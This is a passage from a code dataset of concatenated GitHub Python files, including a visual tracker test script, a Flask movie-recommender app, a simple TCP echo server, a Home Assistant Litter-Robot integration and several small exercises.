'config.yaml'))\n # create model\n model = ModelBuilder_tctrackplus('test')\n\n # load model\n model = load_pretrain(model, args.snapshot).cuda().eval()\n\n # build tracker\n tracker = TCTrackplusTracker(model)\n hp=getattr(cfg.HP_SEARCH_TCTrackpp_offline,args.dataset)\n \n else:\n print('No such tracker')\n \n \n cur_dir = os.path.dirname(os.path.realpath(__file__))\n \n dataset_root = os.path.join(cur_dir, '../test_dataset', args.dataset)\n \n\n # create dataset\n dataset = DatasetFactory.create_dataset(name=args.dataset,\n dataset_root=dataset_root,\n load_img=False)\n\n model_name = args.tracker_name\n\n for v_idx, video in enumerate(dataset):\n if args.video != '':\n # test one special video\n if video.name != args.video:\n continue\n toc = 0\n pred_bboxes = []\n scores = []\n track_times = []\n for idx, (img, gt_bbox) in enumerate(video):\n tic = cv2.getTickCount()\n if idx == 0:\n cx, cy, w, h = get_axis_aligned_bbox(np.array(gt_bbox))\n gt_bbox_ = [cx-(w-1)/2, cy-(h-1)/2, w, h]\n tracker.init(img, gt_bbox_)\n pred_bbox = gt_bbox_\n scores.append(None)\n if 'VOT2018-LT' == args.dataset:\n pred_bboxes.append([1])\n else:\n pred_bboxes.append(pred_bbox)\n else:\n outputs = tracker.track(img,hp)\n pred_bbox = outputs['bbox']\n pred_bboxes.append(pred_bbox)\n scores.append(outputs['best_score'])\n toc += cv2.getTickCount() - tic\n track_times.append((cv2.getTickCount() - tic)/cv2.getTickFrequency())\n if idx == 0:\n cv2.destroyAllWindows()\n if args.vis and idx > 0:\n gt_bbox = list(map(int, gt_bbox))\n pred_bbox = list(map(int, pred_bbox))\n cv2.rectangle(img, (gt_bbox[0], gt_bbox[1]),\n (gt_bbox[0]+gt_bbox[2], gt_bbox[1]+gt_bbox[3]), (0, 255, 0), 3)\n cv2.rectangle(img, (pred_bbox[0], pred_bbox[1]),\n (pred_bbox[0]+pred_bbox[2], pred_bbox[1]+pred_bbox[3]), (0, 255, 255), 3)\n cv2.putText(img, str(idx), (40, 40), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 255, 255), 2)\n cv2.imshow(video.name, img)\n cv2.waitKey(1)\n toc /= cv2.getTickFrequency()\n # save results\n\n model_path = os.path.join('results', args.dataset, model_name)\n if not os.path.isdir(model_path):\n os.makedirs(model_path)\n result_path = os.path.join(model_path, '{}.txt'.format(video.name))\n with open(result_path, 'w') as f:\n for x in pred_bboxes:\n f.write(','.join([str(i) for i in x])+'\\n')\n print('({:3d}) Video: {:12s} Time: {:5.1f}s Speed: {:3.1f}fps'.format(\n v_idx+1, video.name, toc, idx / toc))\n\nif __name__ == '__main__':\n main()\n","repo_name":"vision4robotics/TCTrack","sub_path":"tools/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":5247,"program_lang":"python","lang":"en","doc_type":"code","stars":139,"dataset":"github-code","pt":"52"} +{"seq_id":"23393825609","text":"import numpy as np\n\ndef alignChannels(red, green, blue):\n \"\"\"Given 3 images corresponding to different channels of a color image,\n compute the best aligned result with minimum abberations\n\n Args:\n red, green, blue - each is a HxW matrix corresponding to an HxW image\n\n Returns:\n rgb_output - HxWx3 color image output, aligned as desired\"\"\"\n \n disp_max = 30 #maximum displacement\n [rows,cols] = [red.shape[0],red.shape[1]]\n rgb_mat = np.zeros((rows,cols,3),'uint8') #Initialize matrix for imposing RGB layers on top of each other\n \n #compute SSD to find error between two color intensities\n def ssdCalc(colr1,colr2):\n ssd_err = ((colr1-colr2)**2).sum()\n \n return ssd_err\n \n #find the minimum error by trying out all the possible combinations\n def errorTest(colr1,colr2):\n min_row = 0\n min_col = 0\n errInit = ssdCalc(colr1,colr2) #find the error of the original matrices\n \n #displace row and column to compare the error to original ssd error\n for row in range(-disp_max,disp_max):\n for col in range(-disp_max,disp_max):\n new_colr2 = np.roll(colr2,[row,col],axis = [0,1])\n err_disp = ssdCalc(colr1,new_colr2) #find the ssd error for the new shifted array\n \n if err_disp < errInit:\n errInit = err_disp\n min_row = row\n min_col = col\n \n return [min_row,min_col]\n \n #function to update the values of the rgb matrix\n def rgbUpdate(colr1,colr2,colrIndex):\n [min_error_row,min_error_col] = errorTest(colr1,colr2)\n colr_new = np.roll(colr2,[min_error_row,min_error_col],axis = [0,1])\n rgb_mat[...,colrIndex] = colr_new\n \n return rgb_mat\n \n rgb_mat[...,0] = red\n rgb_mat = rgbUpdate(red,blue,2)\n rgb_mat = rgbUpdate(red,green,1)\n\n return rgb_mat","repo_name":"mishra39/16720_ComputerVision","sub_path":"hw0/hw0/code/alignChannels.py","file_name":"alignChannels.py","file_ext":"py","file_size_in_byte":1962,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"74594811684","text":"v1 = int(input())\nv2 = list(map(int, input().split()))\nqueda = 0 \n\nfor i in range(1, v1):\n if (v2[i] < v2[i-1]):\n queda = i + 1\n break\n\nprint(f'{queda}')","repo_name":"bernardovvieira/algoritmos_e_programacao","sub_path":"13-04-2022/b2167.py","file_name":"b2167.py","file_ext":"py","file_size_in_byte":170,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"11368546625","text":"from django.db import models\nfrom django.contrib.auth.models import User\n\n# Create your models here.\nclass Item(models.Model):\n STATUS_CHOICES = (\n ('pending', 'Pending'),\n ('done', 'Done'),\n ('cancelled', 'Cancelled')\n )\n user = models.ForeignKey(User)\n name = models.CharField(max_length=255)\n status = models.CharField(max_length=9, choices=STATUS_CHOICES, default='pending')\n due_date = models.DateTimeField(null=True)\n date_created = models.DateField(editable=True)\n date_modified = models.DateField(editable=True)\n #date_created = models.DateTimeField(editable=True)\n #date_modified = models.DateTimeField(editable=True)\n\n","repo_name":"raineaway/260_final_project","sub_path":"lists/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"24499859549","text":"#!/usr/bin/env python3\n\nclass MMGenObject(object):\n\t'placeholder - overridden when testing'\n\tdef immutable_attr_init_check(self): pass\n\nimport os\nif os.getenv('MMGEN_DEBUG') or os.getenv('MMGEN_TEST_SUITE') or os.getenv('MMGEN_TRACEBACK'):\n\n\timport sys,re,traceback,json,pprint\n\tfrom decimal import Decimal\n\tfrom difflib import unified_diff,ndiff\n\n\tdef pmsg(*args,out=sys.stderr):\n\t\td = args if len(args) > 1 else '' if not args else args[0]\n\t\tout.write(pprint.PrettyPrinter(indent=4).pformat(d) + '\\n')\n\tdef pdie(*args,exit_val=1,out=sys.stderr):\n\t\tpmsg(*args,out=out)\n\t\tsys.exit(exit_val)\n\tdef pexit(*args,out=sys.stderr):\n\t\tpdie(*args,exit_val=0,out=out)\n\n\tdef Pmsg(*args):\n\t\tpmsg(*args,out=sys.stdout)\n\tdef Pdie(*args):\n\t\tpdie(*args,out=sys.stdout)\n\tdef Pexit(*args):\n\t\tpexit(*args,out=sys.stdout)\n\n\tdef print_stack_trace(message=None):\n\t\ttb1 = traceback.extract_stack()\n\t\ttb2 = [t for t in tb1 if t.filename[:1] != '<'][2:-2]\n\t\tsys.stderr.write('STACK TRACE {}:\\n'.format(message or '(unnamed)'))\n\t\tfs = ' {}:{}: in {}:\\n {}\\n'\n\t\tfor t in tb2:\n\t\t\tfn = re.sub(r'^\\./','',os.path.relpath(t.filename))\n\t\t\tfunc = t.name+'()' if t.name[-1] != '>' else t.name\n\t\t\tsys.stderr.write(fs.format(fn,t.lineno,func,t.line or '(none)'))\n\n\tclass MMGenObject(object):\n\n\t\t# Pretty-print any object subclassed from MMGenObject, recursing into sub-objects - WIP\n\t\tdef pmsg(self):\n\t\t\tprint(self.pfmt())\n\t\tdef pdie(self):\n\t\t\tprint(self.pfmt())\n\t\t\tsys.exit(1)\n\t\tdef pfmt(self,lvl=0,id_list=[]):\n\t\t\tscalars = (str,int,float,Decimal)\n\t\t\tdef do_list(out,e,lvl=0,is_dict=False):\n\t\t\t\tout.append('\\n')\n\t\t\t\tfor i in e:\n\t\t\t\t\tel = i if not is_dict else e[i]\n\t\t\t\t\tif is_dict:\n\t\t\t\t\t\tout.append('{s}{:<{l}}'.format(i,s=' '*(4*lvl+8),l=10,l2=8*(lvl+1)+8))\n\t\t\t\t\tif hasattr(el,'pfmt'):\n\t\t\t\t\t\tout.append('{:>{l}}{}'.format('',el.pfmt(\n\t\t\t\t\t\t\tlvl=lvl+1,id_list=id_list+[id(self)]),l=(lvl+1)*8))\n\t\t\t\t\telif isinstance(el,scalars):\n\t\t\t\t\t\tif isList(e):\n\t\t\t\t\t\t\tout.append('{:>{l}}{:16}\\n'.format('',repr(el),l=lvl*8))\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tout.append(' {}'.format(repr(el)))\n\t\t\t\t\telif isList(el) or isDict(el):\n\t\t\t\t\t\tindent = 1 if is_dict else lvl*8+4\n\t\t\t\t\t\tout.append('{:>{l}}{:16}'.format('','<'+type(el).__name__+'>',l=indent))\n\t\t\t\t\t\tif isList(el) and isinstance(el[0],scalars):\n\t\t\t\t\t\t\tout.append('\\n')\n\t\t\t\t\t\tdo_list(out,el,lvl=lvl+1,is_dict=isDict(el))\n\t\t\t\t\telse:\n\t\t\t\t\t\tout.append('{:>{l}}{:16} {}\\n'.format(\n\t\t\t\t\t\t\t'','<'+type(el).__name__+'>',repr(el),l=(lvl*8)+8))\n\t\t\t\t\tout.append('\\n')\n\t\t\t\tif not e: out.append('{}\\n'.format(repr(e)))\n\n\t\t\tdef isDict(obj):\n\t\t\t\treturn isinstance(obj,dict)\n\t\t\tdef isList(obj):\n\t\t\t\treturn isinstance(obj,list)\n\t\t\tdef isScalar(obj):\n\t\t\t\treturn isinstance(obj,scalars)\n\n\t\t\tout = ['<{}>{}\\n'.format(type(self).__name__,' '+repr(self) if isScalar(self) else '')]\n\t\t\tif id(self) in id_list:\n\t\t\t\treturn out[-1].rstrip() + ' [RECURSION]\\n'\n\t\t\tif isList(self) or isDict(self):\n\t\t\t\tdo_list(out,self,lvl=lvl,is_dict=isDict(self))\n\n\t\t\tfor k in self.__dict__:\n\t\t\t\te = getattr(self,k)\n\t\t\t\tif isList(e) or isDict(e):\n\t\t\t\t\tout.append('{:>{l}}{:<10} {:16}'.format('',k,'<'+type(e).__name__+'>',l=(lvl*8)+4))\n\t\t\t\t\tdo_list(out,e,lvl=lvl,is_dict=isDict(e))\n\t\t\t\telif hasattr(e,'pfmt') and type(e) != type:\n\t\t\t\t\tout.append('{:>{l}}{:10} {}'.format(\n\t\t\t\t\t\t'',k,e.pfmt(lvl=lvl+1,id_list=id_list+[id(self)]),l=(lvl*8)+4))\n\t\t\t\telse:\n\t\t\t\t\tout.append('{:>{l}}{:<10} {:16} {}\\n'.format(\n\t\t\t\t\t\t'',k,'<'+type(e).__name__+'>',repr(e),l=(lvl*8)+4))\n\n\t\t\timport re\n\t\t\treturn re.sub('\\n+','\\n',''.join(out))\n\n\t\t# Check that all immutables have been initialized. Expensive, so do only when testing.\n\t\tdef immutable_attr_init_check(self):\n\t\t\tfrom .globalvars import g\n\t\t\tif g.test_suite:\n\t\t\t\tfrom .util import rdie\n\t\t\t\tcls = type(self)\n\t\t\t\tfor attrname in sorted({a for a in self.valid_attrs if a[0] != '_'}):\n\t\t\t\t\tfor o in (cls,cls.__bases__[0]): # assume there's only one base class\n\t\t\t\t\t\tif attrname in o.__dict__:\n\t\t\t\t\t\t\tattr = o.__dict__[attrname]\n\t\t\t\t\t\t\tbreak\n\t\t\t\t\telse:\n\t\t\t\t\t\trdie(3,'unable to find descriptor {}.{}'.format(cls.__name__,attrname))\n\t\t\t\t\tif type(attr).__name__ == 'ImmutableAttr':\n\t\t\t\t\t\tif attrname not in self.__dict__:\n\t\t\t\t\t\t\tfs = 'attribute {!r} of {} has not been initialized in constructor!'\n\t\t\t\t\t\t\trdie(3,fs.format(attrname,cls.__name__))\n\n\tdef print_diff(a,b,from_file='',to_file='',from_json=True):\n\t\tif from_json:\n\t\t\ta = json.dumps(json.loads(a),indent=4).split('\\n') if a else []\n\t\t\tb = json.dumps(json.loads(b),indent=4).split('\\n') if b else []\n\t\telse:\n\t\t\ta = a.split('\\n')\n\t\t\tb = b.split('\\n')\n\t\tsys.stderr.write(' DIFF:\\n {}\\n'.format('\\n '.join(unified_diff(a,b,from_file,to_file))))\n\n\tdef get_ndiff(a,b):\n\t\ta = a.split('\\n')\n\t\tb = b.split('\\n')\n\t\treturn list(ndiff(a,b))\n","repo_name":"totaltrader/mmgen","sub_path":"mmgen/devtools.py","file_name":"devtools.py","file_ext":"py","file_size_in_byte":4685,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"52"} +{"seq_id":"14385045201","text":"from setuptools import setup, find_packages\nfrom pathlib import Path\n\nthis_directory = Path(__file__).parent\nlong_description = (this_directory / \"README.md\").read_text()\n\nVERSION = \"0.1.5\"\nDESCRIPTION = (\n \"This package will allow the developer to use an mvc structure in a Flet project.\"\n)\n\n# Setting up\nsetup(\n name=\"flet-mvc\",\n version=VERSION,\n author=\"o0Adrian (C. Adrián Monroy)\",\n author_email=\"\",\n description=DESCRIPTION,\n url=\"https://github.com/o0Adrian/flet-mvc\",\n long_description_content_type=\"text/markdown\",\n long_description=long_description,\n packages=find_packages(),\n package_data={\n \"mvc_commands\": [\n \"templates/*\",\n \"templates/*/*\",\n \"templates/*/*/*\",\n ],\n },\n install_requires=[\n \"flet>=0.7.4\",\n \"click>=8.1.3\",\n ],\n keywords=[\n \"mvc\",\n \"flet\",\n \"flet mvc\",\n \"model\",\n \"view\",\n \"controller\",\n \"node\",\n \"datapoint\",\n ],\n entry_points={\n \"console_scripts\": [\n \"flet-mvc=mvc_commands.cli:cli\",\n ],\n },\n classifiers=[\n \"Development Status :: 4 - Beta\",\n \"Intended Audience :: Developers\",\n \"Programming Language :: Python :: 3\",\n \"Operating System :: Unix\",\n \"Operating System :: MacOS :: MacOS X\",\n \"Operating System :: Microsoft :: Windows\",\n ],\n)\n","repo_name":"o0Adrian/flet-mvc","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1443,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"52"} +{"seq_id":"42300625288","text":"from socket import *\n\nserver_port = 12000\n\n# Create socket\nserver_socket = socket(AF_INET, SOCK_STREAM)\n# Bind welcoming socket to port\nserver_socket.bind((\"\", server_port))\n# Listen for TCP requests. 1 max queued connection.\nserver_socket.listen(1)\n\nprint(\"Ready to recieve.\")\n\nwhile True:\n # accept the connection, complete the handshake. Create TCP connenction.\n connection_socket, addr = server_socket.accept()\n sentence = connection_socket.recv(1024).decode()\n response_sentence = sentence.upper()\n connection_socket.send(response_sentence.encode())\n connection_socket.close()\n print(\"Recieved: \", sentence)\n print(\"Responded: \", response_sentence)","repo_name":"zcribe/Raamatud-Books","sub_path":"kuroseRoss/Chapter 2/TCPServer.py","file_name":"TCPServer.py","file_ext":"py","file_size_in_byte":677,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"72240879844","text":"import sys\nimport math\n\ndef anagram(word):\n s=math.factorial(len(word))\n result={}\n for i in word:\n if i in result:\n result[i]+=1\n else:\n result[i]=1\n for j in result:\n s//=math.factorial(result[j])\n return s\n\nmat=[] \nfor i in sys.stdin:\n mat.append(i.strip())\nfor j in mat:\n print(anagram(j))\n \n","repo_name":"luna-ortus-cor/CS2040C","sub_path":"kattis_py/anagramcounting.py","file_name":"anagramcounting.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"12211132545","text":"\"\"\"\npurpose: to store the URL endpoints for the front end of our website\n -- we store the routes (main pages of our website, like login, sign-up, main page, etc)\n -- import Blueprint means we define this file as a blueprint (it has a bunch of URLs/roots in it)\n\"\"\"\nfrom flask import Blueprint, render_template, request, flash, jsonify\nfrom flask_login import login_required, current_user\nfrom .models import Note, Recommended, IMDB_top_10\nfrom . import db \nfrom google_links_and_posters_BS4 import get_google_1st_link, get_google_page, get_image, compute_three, compute_array\nfrom movieREC_use_model import rec_10, titles_only\nfrom imdb_get_top_ten import get_top_10_imdb\nimport json\n\nviews = Blueprint('views', __name__) # set up a views blueprint for our flask application\n\n\n@views.route('/journal', methods=['GET', 'POST']) # define 1st view (this is a decorator)\n@login_required # 2nd decorator, cannot get to home pg without loggin in\ndef home():\n if request.method == 'POST':\n note = request.form.get('note')\n\n if len(note) < 1:\n flash('Note is too short!', category='error')\n else:\n new_note = Note(data=note, user_id=current_user.id)\n db.session.add(new_note)\n db.session.commit()\n #flash('Journal entry added!', category='success')\n\n return render_template(\"journal.html\", user=current_user)\n\n@views.route('/recommend', methods=['GET', 'POST']) # define 1st view (this is a decorator)\n@login_required # 2nd decorator, cannot get to home pg without loggin in\ndef recommend():\n for j in range(15):\n old_rec = Recommended.query.first()\n if old_rec:\n if old_rec.user_id == current_user.id:\n db.session.delete(old_rec)\n db.session.commit()\n else:\n break\n\n if request.method == 'POST':\n user_movie = request.form.get('movie')\n\n if len(user_movie) < 1:\n flash('Movie title is too short!', category='error')\n else:\n user_movie = user_movie.lower() # make everything lowercase, then capitalize each word\n user_movie = user_movie.title()\n try:\n ten_rec, found_movie = rec_10(user_movie)\n except:\n flash('Movie not found:(', category='error')\n return render_template(\"recommend.html\", user=current_user)\n recommendations = titles_only(str(ten_rec))\n results = compute_array(recommendations[:12])\n x = 1\n for i, three_links in enumerate(results):\n link1 = three_links[0]\n link2 = three_links[1]\n img_link = three_links[2]\n if img_link == None: # avoid displaying a bad link (no img, void link)\n continue # simply skip to next recommended movie\n title = str(x) + ') ' + str(recommendations[i])\n new_rec = Recommended(data=title, link1=link1, link2=link2, img_link=img_link, user_id=current_user.id)\n db.session.add(new_rec)\n db.session.commit()\n x += 1\n flash('Movie found!', category='success')\n\n found_movie = \"Our recommendations for you for: \" + str(found_movie)\n found_title = Recommended(found_title=found_movie, user_id=current_user.id)\n db.session.add(found_title)\n db.session.commit()\n\n return render_template(\"recommend.html\", user=current_user)\n\n@views.route('/imdb_top_10', methods=['GET', 'POST']) # define 1st view (this is a decorator)\n@login_required # 2nd decorator, cannot get to home pg without loggin in\ndef imdb_top_10():\n top_10 = get_top_10_imdb() # we get an array of 10 movie names back\n results = compute_array(top_10) # imported function, uses threads to run web-scraping concurrently (50 sec --> 4 sec wait time)\n x = 1\n for i, three_links in enumerate(results):\n link1 = three_links[0]\n link2 = three_links[1]\n img_link = three_links[2]\n if img_link == None: # avoid displaying a bad link (no img, void link)\n continue # simply skip to next recommended movie\n movie = str(x) + ') ' + str(top_10[i])\n top_ten_movies = IMDB_top_10(data=str(movie), link1=link1, link2=link2, img_link=img_link, user_id=current_user.id)\n db.session.add(top_ten_movies)\n db.session.commit()\n x += 1\n return render_template(\"imdb_top_10.html\", user=current_user)\n\n@views.route('/delete-note', methods=['POST'])\ndef delete_note():\n note = json.loads(request.data) # turn our data into a python dictionary object\n noteId = note['noteId']\n note = Note.query.get(noteId)\n if note:\n if note.user_id == current_user.id:\n db.session.delete(note)\n db.session.commit()\n\n return jsonify({}) # turn the dictionary into a json object (we don't need the dict, but a return is a must)\n","repo_name":"colinZejda/Movie_recommender_knn_model","sub_path":"website/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5136,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"37559876800","text":"\"\"\"A wrapper 'hub' for the Litter-Robot API and base entity for common attributes.\"\"\"\nfrom datetime import time, timedelta\nimport logging\nfrom types import MethodType\nfrom typing import Any, Optional\n\nimport pylitterbot\nfrom pylitterbot.exceptions import LitterRobotException, LitterRobotLoginException\n\nfrom homeassistant.const import CONF_PASSWORD, CONF_USERNAME\nfrom homeassistant.core import HomeAssistant\nfrom homeassistant.helpers.event import async_call_later\nfrom homeassistant.helpers.update_coordinator import (\n CoordinatorEntity,\n DataUpdateCoordinator,\n)\nimport homeassistant.util.dt as dt_util\n\nfrom .const import DOMAIN\n\n_LOGGER = logging.getLogger(__name__)\n\nREFRESH_WAIT_TIME = 12\nUPDATE_INTERVAL = 10\n\n\nclass LitterRobotHub:\n \"\"\"A Litter-Robot hub wrapper class.\"\"\"\n\n def __init__(self, hass: HomeAssistant, data: dict):\n \"\"\"Initialize the Litter-Robot hub.\"\"\"\n self._data = data\n self.account = None\n self.logged_in = False\n\n async def _async_update_data():\n \"\"\"Update all device states from the Litter-Robot API.\"\"\"\n await self.account.refresh_robots()\n return True\n\n self.coordinator = DataUpdateCoordinator(\n hass,\n _LOGGER,\n name=DOMAIN,\n update_method=_async_update_data,\n update_interval=timedelta(seconds=UPDATE_INTERVAL),\n )\n\n async def login(self, load_robots: bool = False):\n \"\"\"Login to Litter-Robot.\"\"\"\n self.logged_in = False\n self.account = pylitterbot.Account()\n try:\n await self.account.connect(\n username=self._data[CONF_USERNAME],\n password=self._data[CONF_PASSWORD],\n load_robots=load_robots,\n )\n self.logged_in = True\n return self.logged_in\n except LitterRobotLoginException as ex:\n _LOGGER.error(\"Invalid credentials\")\n raise ex\n except LitterRobotException as ex:\n _LOGGER.error(\"Unable to connect to Litter-Robot API\")\n raise ex\n\n\nclass LitterRobotEntity(CoordinatorEntity):\n \"\"\"Generic Litter-Robot entity representing common data and methods.\"\"\"\n\n def __init__(self, robot: pylitterbot.Robot, entity_type: str, hub: LitterRobotHub):\n \"\"\"Pass coordinator to CoordinatorEntity.\"\"\"\n super().__init__(hub.coordinator)\n self.robot = robot\n self.entity_type = entity_type\n self.hub = hub\n\n @property\n def name(self):\n \"\"\"Return the name of this entity.\"\"\"\n return f\"{self.robot.name} {self.entity_type}\"\n\n @property\n def unique_id(self):\n \"\"\"Return a unique ID.\"\"\"\n return f\"{self.robot.serial}-{self.entity_type}\"\n\n @property\n def device_info(self):\n \"\"\"Return the device information for a Litter-Robot.\"\"\"\n return {\n \"identifiers\": {(DOMAIN, self.robot.serial)},\n \"name\": self.robot.name,\n \"manufacturer\": \"Litter-Robot\",\n \"model\": self.robot.model,\n }\n\n async def perform_action_and_refresh(self, action: MethodType, *args: Any):\n \"\"\"Perform an action and initiates a refresh of the robot data after a few seconds.\"\"\"\n\n async def async_call_later_callback(*_) -> None:\n await self.hub.coordinator.async_request_refresh()\n\n await action(*args)\n async_call_later(self.hass, REFRESH_WAIT_TIME, async_call_later_callback)\n\n @staticmethod\n def parse_time_at_default_timezone(time_str: str) -> Optional[time]:\n \"\"\"Parse a time string and add default timezone.\"\"\"\n parsed_time = dt_util.parse_time(time_str)\n\n if parsed_time is None:\n return None\n\n return time(\n hour=parsed_time.hour,\n minute=parsed_time.minute,\n second=parsed_time.second,\n tzinfo=dt_util.DEFAULT_TIME_ZONE,\n )\n","repo_name":"fpetillo/home-assistant","sub_path":"homeassistant/components/litterrobot/hub.py","file_name":"hub.py","file_ext":"py","file_size_in_byte":3931,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"10430462931","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Mar 23 18:44:45 2017\r\n@author: Pablo\r\n\r\nObjetivos:\r\n-Lectura y representación de los archivos profiles.out y halfcells.out\r\n-La lectura debe ser capaz de leer los archivos sin importar su longitud\r\n\r\nGuía:\r\n-Ambos archivos deben encontrarse en la misma carpeta que este script\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\n#Leemos todas las líneas del archivo\r\narchivo = open('profiles.out','r')\r\nlineas = archivo.readlines()\r\narchivo.close()\r\n\r\n#Calculamos el número de filas del archivo para cada tiempo\r\ni = 4 #Empieza a haber datos a partir de la línea 4\r\nnum_distancias = 0\r\n#Se aumenta el contador con cada línea distinta de cero de la primera matriz de\r\n#tiempos\r\nwhile lineas[i] != ' \\n':\r\n num_distancias += 1\r\n i += 1\r\n\r\n#Calculamos el número de tiempos del archivo\r\ndatos_halfcells = open('halfcells.out','r')\r\nlineas_halfcells = datos_halfcells.readlines()\r\ndatos_halfcells.close()\r\nnum_tiempos = len(lineas_halfcells)-1 #la primera linea no tiene datos\r\n\r\n#Declaramos los vectores que contendrán los valores de las columnas\r\ndistancia = np.zeros((num_tiempos,num_distancias)) #Cada columna tiene 101 filas\r\nC_Elec = np.zeros((num_tiempos,num_distancias))\r\nC_Sol_Surf = np.zeros((num_tiempos,num_distancias))\r\nLiq_Pot = np.zeros((num_tiempos,num_distancias))\r\nSolid_Pot = np.zeros((num_tiempos,num_distancias))\r\nJ_main = np.zeros((num_tiempos,num_distancias))\r\n\r\ntiempo = np.zeros(num_tiempos)\r\n\r\nV_neg = np.zeros(num_tiempos)\r\nV_pos = np.zeros(num_tiempos)\r\nHeat_gen = np.zeros(num_tiempos)\r\n\r\n\r\n#Datos profiles.in\r\n#Inicializamos para empezar el ciclo for\r\nfila =0\r\ncolumna = 0\r\n#Cada línea (fila) representa los datos para un tiempo concreto\r\nfor j in range(4,(num_distancias+6)*num_tiempos,num_distancias+6):\r\n for i in range(j,j+num_distancias): #Empieza a haber datos a partir de la línea 4\r\n #Cada elemento de \"lineas\" es un línea entera que convertimos en un vector\r\n linea = lineas[i].split(',')\r\n #A cada variable le vamos asignando su valor de cada línea que leemos\r\n distancia[fila,columna] = float(linea[0])\r\n C_Elec[fila,columna] = float(linea[1])\r\n C_Sol_Surf[fila,columna] = float(linea[2])\r\n Liq_Pot[fila,columna] = float(linea[3])\r\n Solid_Pot[fila,columna] = float(linea[4])\r\n J_main[fila,columna] = float(linea[5])\r\n columna = columna +1\r\n \r\n #Asignamos el tiempo de cada gráfica\r\n linea = lineas[j-1].split()\r\n tiempo[fila] = float(linea[2])\r\n \r\n #Al final del ciclo for pasamos a la siguiente fila y ponemos a cero las columnas\r\n fila = fila+1\r\n columna = 0\r\n \r\n#Datos halfcells.out\r\nfor i in range(1,num_tiempos+1):\r\n linea = lineas_halfcells[i].split()\r\n\r\n V_neg[i-1] = linea[1]\r\n V_pos[i-1] = linea[2]\r\n Heat_gen[i-1] = linea[5] \r\n \r\n#Representamos los resultados\r\ndef plot(numero):\r\n plt.figure(1)\r\n plt.plot(distancia[numero],C_Elec[numero],'o')\r\n plt.plot(distancia[0],C_Elec[0],'o')\r\n plt.ylabel('Concentración Electrolito')\r\n plt.title(tiempo[numero])\r\n plt.xlabel('Distancia')\r\n\r\n plt.figure(2)\r\n plt.plot(distancia[numero],C_Sol_Surf[numero],'o')\r\n plt.plot(distancia[0],C_Sol_Surf[0],'o')\r\n plt.ylabel('Concentración Sólido')\r\n plt.xlabel('Distancia')\r\n plt.title(tiempo[numero])\r\n\r\n plt.figure(3)\r\n plt.plot(distancia[numero],Liq_Pot[numero],'o')\r\n plt.plot(distancia[0],Liq_Pot[0],'o')\r\n plt.ylabel('Potencial en el líquido')\r\n plt.xlabel('Distancia')\r\n plt.title(tiempo[numero])\r\n\r\n plt.figure(4)\r\n plt.plot(distancia[numero],Solid_Pot[numero],'o')\r\n plt.plot(distancia[0],Solid_Pot[0],'o')\r\n plt.ylabel('Potencial en el sólido')\r\n plt.xlabel('Distancia')\r\n plt.title(('Tiempo =', tiempo[numero],' min'))\r\n \r\n plt.figure(5)\r\n plt.plot(tiempo,V_pos-V_neg)\r\n plt.ylabel('Voltaje celda (V)')\r\n plt.xlabel('Tiempo (s)')\r\n \r\n\"\"\"\r\n plt.figure(6)\r\n plt.plot(distancia[numero],J_main[numero],'o')\r\n plt.ylabel('J main')\r\n plt.xlabel('Distancia')\r\n\"\"\"\r\n#Representamos los resultados para el último tiempo\r\nplot(num_tiempos-1)\r\n","repo_name":"pablocscode/TFG-CAEBAT","sub_path":"representacion1.5.py","file_name":"representacion1.5.py","file_ext":"py","file_size_in_byte":4170,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"31328408410","text":"# https://www.acmicpc.net/problem/7569\n\nfrom collections import deque\nimport sys\ninput = sys.stdin.readline\n\n\ndef bfs():\n while queue:\n x, y, z = queue.popleft()\n\n for i in range(6):\n nx = directions[i][0] + x\n ny = directions[i][1] + y\n nz = directions[i][2] + z\n\n if not 0 <= nx < H or not 0 <= ny < N or not 0 <= nz < M:\n continue\n\n if tomato[nx][ny][nz] == 0 and visited[nx][ny][nz] == False:\n queue.append((nx, ny, nz))\n tomato[nx][ny][nz] = tomato[x][y][z] + 1\n visited[nx][ny][nz] = True\n\n\nM, N, H = map(int, input().split())\ntomato = [[list(map(int, input().split())) for i in range(N)] for i in range(H)]\n\nqueue = deque()\ndirections = [[-1, 0, 0], [1, 0, 0], [0, -1, 0], [0, 1, 0], [0, 0, -1], [0, 0, 1]]\nvisited = [[[False] * M for i in range(N)] for i in range(H)]\nfor i in range(H):\n for j in range(N):\n for k in range(M):\n if tomato[i][j][k] == 1:\n queue.append((i, j, k))\n visited[i][j][k] = True\n\nbfs()\nanswer = 0\nfor i in tomato:\n for j in i:\n for k in j:\n if k == 0:\n print(-1)\n exit(0)\n answer = max(answer, max(j))\nprint(answer - 1)\n","repo_name":"kijen723/KraftonJungleAlgorithms","sub_path":"WEEK03/7569-토마토.py","file_name":"7569-토마토.py","file_ext":"py","file_size_in_byte":1293,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"14929331817","text":"import os\nimport sys\nimport pandas as pd\n\ndef main():\n year = int(os.environ[\"POPULATION_YEAR\"])\n pop = pd.read_excel(sys.argv[1], sheet_name=\"Flat\")\n pop = pop[pop[\"Year\"] == year]\n colname_mapping = {\n \"MYE\": 